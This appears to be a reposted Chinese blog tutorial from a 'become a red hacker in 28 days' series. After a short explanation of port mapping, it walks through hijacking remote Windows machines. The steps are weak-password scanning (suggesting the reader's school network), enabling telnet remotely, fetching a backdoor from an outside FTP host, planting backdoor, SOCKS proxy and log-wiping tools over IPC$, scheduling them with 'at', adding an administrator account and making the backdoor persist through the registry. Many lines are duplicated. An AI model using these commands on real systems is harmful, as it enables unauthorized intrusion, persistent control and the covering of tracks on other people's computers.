28天打造专业红客(四)
2024-05-02 19:52:10
[第4天]从简单的网络命令讲起
昨天的帖子发表后,很多朋友问了很多问题,我发现很多朋友对基本的网络命令还很生疏,请你看这个帖子,里面讲的很详细的[url]http://www.91one.net/dvbbs/dispbbs.asp?boardID=14&ID=403[/url]
有个朋友问了我个问题:端口映射是什么意思??
其实很简单的,采用端口映射(Port Mapping)的方法,可以实现从Internet到局域网内部机器的特定端口服务的访问。例如,你所使用的机子处于一个连接到Internet的局域网内,你在机子上所开的所有服务(如FTP),默认情况下外
界是访问不了的。这是因为你机子的IP是局域网内部IP,而外界能访问的只有你所连接的服务器的IP,由于整个局域网在Internet上只有一个真正的IP地址,而这个IP地址是属于局域网中服务器独有的。所以,外部的Internet登录时只
可以找到局域网中的服务器,那你提供的服务当然是不起作用的。
所以解决这个问题的方法就是采用PM了。
有篇文章不错。大家看看:[url]http://www.pconline.com.cn/pcedu/soft/lan/jywgl/10301/127157.html[/url]
所以解决这个问题的方法就是采用PM了。
有篇文章不错。大家看看:[url]http://www.pconline.com.cn/pcedu/soft/lan/jywgl/10301/127157.html[/url]
继续讲,昨天有人说我找到个肉鸡,但不会用远程控制软件。先说用什么好呢
我推荐Remote Administrator,有篇介绍它的文章很好:[url]http://www.pcworld.com.cn/2002/back_issues/2205/0533e.asp[/url]
下载:[url]http://www.skycn.com/soft/15592.html[/url]
我想里面的说明你应该能很好理解的
现在我以一个例子来说一下怎么获得一个肉鸡,虽然前面一直在说,但好象有点乱的,下面说的这个有点投机取巧的感觉,至少我这样觉得,不过因为很多朋友说都5天了,我什么都没搞到啊,所以只能。。
第一步:扫描弱口令
这里我用20cn开发的scanipc (这[url]http://down.yqdown.com/xdown/yqdown0316/scanipc.rar[/url]有下的)
不一会就会扫到很多有弱口令的主机
(你可以拿你们学校的IP试试)
这里我用20cn开发的scanipc (这[url]http://down.yqdown.com/xdown/yqdown0316/scanipc.rar[/url]有下的)
不一会就会扫到很多有弱口令的主机
(你可以拿你们学校的IP试试)
这里我用opentelnet(远程启动TELNET的小东西,这里下:[url]http://www.infosw.com/down/software.asp?id=1520[/url])给扫描到开了空口令的主机开个端口让我们telnet连接上去
,开了23端口,并可以连接上的主机就不用进行次步骤了!
Opentelnet使用方法:
OpenTelnet.exe \\server<帐号> <密码> <NTLM认证方式> <Telnet端口>
列如:
C:\>OpenTelnet.exe \\192.168.1.2administrator 123456 1 90 用户名:administrator 密码:123456
NTLM认证方式:1(也可以选择0请自己测试) 开的端口:90
运行完,如果屏幕上出现 Disconnecting server...Successfully! 就说明已经成功。
这样,我们就能够得到一个开90端口的Telnet服务器了。
,开了23端口,并可以连接上的主机就不用进行次步骤了!
Opentelnet使用方法:
OpenTelnet.exe \\server<帐号> <密码> <NTLM认证方式> <Telnet端口>
列如:
C:\>OpenTelnet.exe \\192.168.1.2administrator 123456 1 90 用户名:administrator 密码:123456
NTLM认证方式:1(也可以选择0请自己测试) 开的端口:90
运行完,如果屏幕上出现 Disconnecting server...Successfully! 就说明已经成功。
这样,我们就能够得到一个开90端口的Telnet服务器了。
Telnet 192.168.1.2 90
这样就可以登录上去了。
这样就可以登录上去了。
第三步:配置并安装后门程序
这里我选择WinShell(小巧精干我喜欢下载:[url]http://www.hktk.com/soft/soft_server/winshell.html[/url]),用winshell主程序设置好后门,然后把后门程序传到台FTP空间上!
列如:
c:\>ftp
ftp>openwww.cnwill.com
然后输入用户名字 密码把后门传上去mput c:\cnwill.exe
现在我们登陆到肉鸡上 Telnet 192.168.1.2 90
把刚上传的后门程序下载并运行(别忘记删除 后门程序)
『后门也可以用net命令完成』
这里我选择WinShell(小巧精干我喜欢下载:[url]http://www.hktk.com/soft/soft_server/winshell.html[/url]),用winshell主程序设置好后门,然后把后门程序传到台FTP空间上!
列如:
c:\>ftp
ftp>openwww.cnwill.com
然后输入用户名字 密码把后门传上去mput c:\cnwill.exe
现在我们登陆到肉鸡上 Telnet 192.168.1.2 90
把刚上传的后门程序下载并运行(别忘记删除 后门程序)
『后门也可以用net命令完成』
net user \\192.168.1.290\ipc$ "" /user:"administrator"
[ 建 立 IPC$ 连 接 ]
copy d:\zilong.exe \\192.168.1.290\admin$\system32
[ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里]
[ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里]
copy d:\long.exe \\192.168.1.290\admin$\system32
[上 传 一 个 删 除 日 志 程 序 到 对 方 的 主 机 里]
[上 传 一 个 删 除 日 志 程 序 到 对 方 的 主 机 里]
copy d:\scoks.exe \\192.168.1.290\admin$\system32
[ 上 传 一 个 SCOKS 代 理 程 序 到 对 方 的 主 机 里]
[ 上 传 一 个 SCOKS 代 理 程 序 到 对 方 的 主 机 里]
copy d:\zilong.reg \\192.168.1.290\admin$\system32
[上 传 导 入 注 册 表的 REG 文 件 到 对 方 的 主 机 里]请看后门说明
[上 传 导 入 注 册 表的 REG 文 件 到 对 方 的 主 机 里]请看后门说明
net time \\192.168.1.290
[ 得 到 对 方 主 机 的 当 前 时 间]
[ 得 到 对 方 主 机 的 当 前 时 间]
at \\192.168.1.290 13:20 zilong.exe
[用 a t命 令 执 行 我 们 的 后 门 程 序] 别 把 时 间 搞 错 了 哦
[用 a t命 令 执 行 我 们 的 后 门 程 序] 别 把 时 间 搞 错 了 哦
==============
如果大家用不习惯命令的话,那就用流光的IPC种植者吧,简单易用.这里就不赘述啦
=============
如果大家用不习惯命令的话,那就用流光的IPC种植者吧,简单易用.这里就不赘述啦
=============
telnet 192.168.1.2 90
[ 从 我 们 设 置 的 后 门 程 序 登 陆 主 机 ]
[ 从 我 们 设 置 的 后 门 程 序 登 陆 主 机 ]
net user **** /add
[近来后添加一个用户名再说或者也可以选择激活guest]
[近来后添加一个用户名再说或者也可以选择激活guest]
net localgroup administrators **** /add
[ 把 自 己 添 加 到 管 理 组 里,这 样 我 们 就 是 超 级 管 理 员 了]
[ 把 自 己 添 加 到 管 理 组 里,这 样 我 们 就 是 超 级 管 理 员 了]
regedit /s c:\winnt\system32\zilong.reg
[ 把 后 门 程 序 导 入 注 册 表 的 启 动 项]这样做是防止被别人停止我们
的后门服务程序,就算我们的后门服务程序被停止了,在主机重启动后我们的后门
服务就又继续运行了.
[ 把 后 门 程 序 导 入 注 册 表 的 启 动 项]这样做是防止被别人停止我们
的后门服务程序,就算我们的后门服务程序被停止了,在主机重启动后我们的后门
服务就又继续运行了.
SOCKS -install
[ 开 始 安 装 socks 代 理]
[ 开 始 安 装 socks 代 理]
SCOKS -config starttype 2
[ 使 SOCKS 代 理 程 序 自 动 运 行,不 怕 肉 鸡 再 重 启 了]
[ 使 SOCKS 代 理 程 序 自 动 运 行,不 怕 肉 鸡 再 重 启 了]
socks -config port 1080
[ socks 代 理 端 口 设 置 为 1080 ]
[ socks 代 理 端 口 设 置 为 1080 ]
net start skserver
[ 启 动 SOCKS 代 理 服 务 ]可以打开QQ设置IP代理了
[ 启 动 SOCKS 代 理 服 务 ]可以打开QQ设置IP代理了
long
[ 刚 才 上 传 的 一 个 删 除 日 志 程 序,运 行 它 就 可 以 了]
[ 刚 才 上 传 的 一 个 删 除 日 志 程 序,运 行 它 就 可 以 了]
转载于:https://blog.51cto.com/zhouhaipeng/98773
28天打造专业红客(四)相关推荐
- 30天打造专业红客四
30天打造专业红客 『第12天』从ipc$ 连接失败讲起 我们最好先来看一下什么是ipc¥连接.ipc(internet process connection)是远程网络连接.而ipc$,admi ...
- 28天打造专业红客(一)
何谓"***" ***是英文"HACKER"的音译.动词原形为"HACK",意为"劈"."砍".英文 ...
- 28天打造专业红客(十一)
[第11天]80端口***总结 今天我们来说说80端口的***方法,只是把大概的说一下,肯定有遗漏了. 我将描述每种***的作用,和其怎样利用这些漏洞进行***(注意host的意思你应该懂吧) (1) ...
- 30天打造专业红客二
30天打造专业红客 [第5天]从简单的网络命令讲起 有个朋友问了我个问题:端口映射是什么意思?? 其实很简单的,采用端口映射(Port Mapping)的方法,可以实现从Internet到局域网内部机 ...
- 30天打造专业红客七
30天打造专业红客 『第27天』深入对iis写权限的利用 大家可能看过<远程分析IIS设置>,里面对iis的各种设置进行了分析,我这里就对iis的写权限来分析下,以下引用<远程分析I ...
- 30天打造专业红客八
相关知识 全国IP 全国IP,从追捕中找的 010.179.000.000__010.183.255.255__甘肃____ 010.184.000.000__010.188.255.255__ ...
- 怒肝1.3w+字给学姐讲明白计算机专业大学四年到底该学什么?
点击上方"五分钟学算法",选择"星标"公众号 重磅干货,第一时间送达 网上已经有挺多关于"计算机专业大学四年到底应该学什么?"相关的文章了. ...
- 计算机工程师英语介绍,数据库系统工程师计算机专业英语(四).doc
PAGE PAGE 1 [模拟] 数据库系统工程师计算机专业英语(四) 选择题 In object-oriented (1) , objects can be viewed as reusable c ...
- 打造专业人才发展链条:基于任职资格的专业人才发展与认证体系
打造专业人才发展链条:基于任职资格的专业人才发展与认证体系 https://www.toutiao.com/i6925819144583561731/?tt_from=weixin&utm_c ...
最新文章
- redis之父表示ARM服务器没戏
- 网站颜色搭配的好网站。
- Keras之DNN::基于Keras(sigmoid+binary_crossentropy+predict_classes)利用DNN实现二分类——DIY二分类数据集预测新数据点
- CRM/PLM/SCM/MES与ERP的联系与区别
- java编译生成哪些文件_java编译后生成什么文件?生成的文件包括什么?
- OSChina 周一乱弹 —— 最无法理解的程序员行为
- JavaScript运行机制:event-loop
- 对大家的工作和职业方向有益才是我的最终目的
- dubbo service注解用法_dubbo学习(四)配置dubbo 注解方式配置
- OICQ登录号码清除器实现原理 (转)
- aspcms首页content内容html代码过滤,ASPCMS用百度编辑器JS/html代码(script标签)被过滤的解决办法...
- 网络直播课程:神马是敏捷?(直播时间:2014-7-14 20:00-21:00)
- android hdmi拔插广播,拒绝频繁拔插:绿联 HDMI切换器 晒单
- 记录ideavim,使用tab技巧
- 爬取起点网站图书信息(书名、作者、简介、图片url)
- linux文件取交集、差集、并集
- 定时向QQ推送天气消息
- 高频变压器为什么能够输出这么大的电流?
- 在VISTA系统下使用IPX协议
- 电脑不依靠软件强制删除文件夹及文件